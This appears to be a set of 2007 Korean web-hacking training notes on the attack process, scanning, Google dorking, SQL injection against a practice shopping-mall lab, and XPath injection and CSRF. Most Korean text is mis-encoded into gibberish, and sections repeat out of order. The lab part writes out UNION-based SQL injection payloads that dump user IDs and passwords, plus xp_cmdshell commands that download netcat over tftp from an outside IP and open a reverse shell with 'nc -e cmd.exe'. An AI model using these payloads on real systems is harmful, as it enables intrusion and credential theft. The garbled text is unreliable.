Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
